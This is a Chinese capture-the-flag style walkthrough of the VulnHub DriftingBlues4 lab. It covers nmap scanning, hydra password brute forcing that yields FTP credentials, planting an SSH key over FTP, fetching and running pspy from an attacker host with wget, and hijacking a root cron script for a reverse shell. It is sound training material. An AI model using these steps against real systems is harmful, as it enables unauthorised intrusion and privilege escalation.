靶机渗透练习04-driftingblues4

靶机地址： https://www.vulnhub.com/entry/driftingblues-4,661

1、主机探活

arp-scan -I eth0 -l （指定网卡扫）扫描局域网所有设备（所有设备IP、MAC地址、制造商信息）
masscan 192.168.111.0/24 -p 80,22 （masscan 扫描的网段 -p 扫描端口号）
netdiscover -i eth0 -r 192.168.184.0/24 （netdiscover -i 网卡-r 网段）
nmap -sn 192.168.111.0/24

2、端口扫描

nmap -sS -A -sV -T4 -p- 192.168.111.15
21—ftp—ProFTPD
22—ssh—OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80—http—Apache httpd 2.4.38 ((Debian))

3、80端口分析
打开一看啥也没有，直接查看源代码，出现一串base64

Z28gYmFjayBpbnRydWRlciEhISBkR2xuYUhRZ2MyVmpkWEpwZEhrZ1pISnBjSEJwYmlCaFUwSnZZak5DYkVsSWJIWmtVMlI1V2xOQ2FHSnBRbXhpV0VKellqTnNiRnBUUWsxTmJYZ3dWMjAxVjJGdFJYbGlTRlpoVFdwR2IxZHJUVEZOUjFaSlZWUXdQUT09解码得到：
go back intruder!!! dGlnaHQgc2VjdXJpdHkgZHJpcHBpbiBhU0JvYjNCbElIbHZkU2R5WlNCaGJpQmxiWEJzYjNsbFpTQk1NbXgwV201V2FtRXliSFZhTWpGb1drTTFNR1ZJVVQwPQ==再解码：
tight security drippin aSBob3BlIHlvdSdyZSBhbiBlbXBsb3llZSBMMmx0Wm5WamEybHVaMjFoWkM1MGVIUT0=再解码：
i hope you're an employee L2ltZnVja2luZ21hZC50eHQ=再解码......
/imfuckingmad.txt

访问后出现一堆奇怪的字符，应该是某种编码，放入在线网站探测一波

http://www.dcode.fr/cipher-identifier发现是 Brainfuck 解密，然后进行解密
得到一张图片: /iTiS3Cr3TbiTCh.png

保存到本地用QR进行分析，或者直接使用在线二维码识别网站也行

得到一个url，访问看看（发现无法访问，那应该是需要科学上网了）

4、获得一些用户名，存为user.txt，将其做成字典用于21、22端口的爆破

luther
gary
Hubert
clark

密码字典使用kali自带的rockyou.txt文件

hydra -L user.txt -P /usr/share/wordlists/rockyou.txt  192.168.111.15 ftp
hydra -L user.txt -P /usr/share/wordlists/rockyou.txt  192.168.111.15 sshssh爆破失败，ftp成功爆破出一个账号密码：luther/mypics

5、登录ftp进行信息探测

ftp 192.168.111.15

发现hubert家目录具有777权限，所以我们的思路是在用户hubert的目录下写入私钥，来进行免密登录
6、我们在家目录创建.ssh目录，然后直接将kali的公钥重命名为authorized_keys，并把authorized_keys上传到该目录下

ftp 192.168.9.26
输入账户：luther
输入密码：mypics
cd hubert
mkdir .ssh
cd .ssh
put authorized_keysssh hubert@192.168.111.15

7、提权
本地目录下还有一个py文件，属主为root，内容是执行一个系统命令：为向/tmp/backdoor_testing文件中增加1

思路：如果它是个定时任务的话我们就可以修改emergenc.py文件，内容为反弹shell，然后当以root身份运行这个定时任务的时候我们就可以获得root权限的shell
那么如何判断它是否是个定时任务呢，这里推荐使用一个文件 pspy64，可以对进程文件进行监控

下载pspy64：wget http://192.168.111.7/pspy64
chmod +x pspy64
./pspy64

发现该python文件一分钟执行一次,所以是定时任务，执行我们的思路获得root权限
尝试将1.py覆盖掉原来的emergency.py,发现不行,权限不够,
但是用nano进行修改文件,并且保存为emergency.pyM,然后再尝试进行覆盖，发现覆盖成功,然后攻击机监听1234端口

等待反弹即可获得root shell

思路二：命令劫持提权

在 shell 中寻找 suid 程序： find / -perm -u=s -type f 2>/dev/null发现一个不常见的程序 /usr/bin/getinfo
和driftingblues3靶机操作一模一样，参考之前的文章操作也可以获得root权限

完结散花~

参考：https://www.sec-in.com/article/1401
https://www.freebuf.com/articles/others-articles/278323.html

靶机渗透练习04-driftingblues4相关推荐

dc-3 靶机渗透学习
靶机修复 dc-3靶机可能会存在扫不到靶机ip的问题,可以参考下面这篇博客解决,编辑网卡配置文件时命令有点错误. vim /etc/network/interfacers 改成 vim /etc/ne ...
DC-3靶机渗透测试
DC-3 查看靶机mac地址获取IP地址 Nmap JooScan sqlmap john 上传Webshell nc反弹提权 DC-3只有一个目标获得root权限,拿到flag. 查看靶机mac ...
HackInOS靶机渗透writeup
HackInOS靶机渗透writeup 0x00准备测试环境导入下载好的HackInOS.ova文件后,将网络设置成桥接模式,并使用DHCP分配IP. 成功后打开的靶机图如下 0x01渗透过程使用 ...
DC-3靶机渗透测试
DC-3靶机渗透测试环境搭建 kali-Linux(VMware) DC-3(VMware)靶机下载链接:https : //download.vulnhub.com/dc/DC-3-2.zip 这 ...
HA: SHERLOCK 靶机渗透取证
HA: SHERLOCK 靶机渗透取证靶机描述: DescriptionHA: Sherlock! This lab is based on the famous investigator's jo ...
[网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例（一）
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可 ...
[HTB]“Heist”靶机渗透详细思路
今天我们来看一下hackthebox里的一个靶机"Heist",直接开始渗透. 一.信息搜集先打开网站看看.是一个登陆框,使用弱口令和注入都无果.在网页中发现了 login as ...
[网络安全自学篇] 七十五.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell（三）
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步.前文分享了APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施.这篇文章将讲 ...
【渗透测试】靶机渗透Vulnhub-bulldog
目录前言一.bulldog靶机安装二.bulldog靶机渗透 1.信息搜集 2.Web渗透--后台登录 3.Web渗透--命令注入&nc反弹shell 4.权限提升渗透步骤回顾感悟 ...
靶机渗透【bulldog】
文章目录 *一. bulldog靶机安装* 1. 下载bulldog 2. 开启bulldog *二. bulldog靶机渗透* 1. 信息收集 2. Web渗透 3. 命令注入&nc反弹sh ...

靶机渗透练习04-driftingblues4

靶机渗透练习04-driftingblues4相关推荐

最新文章

热门文章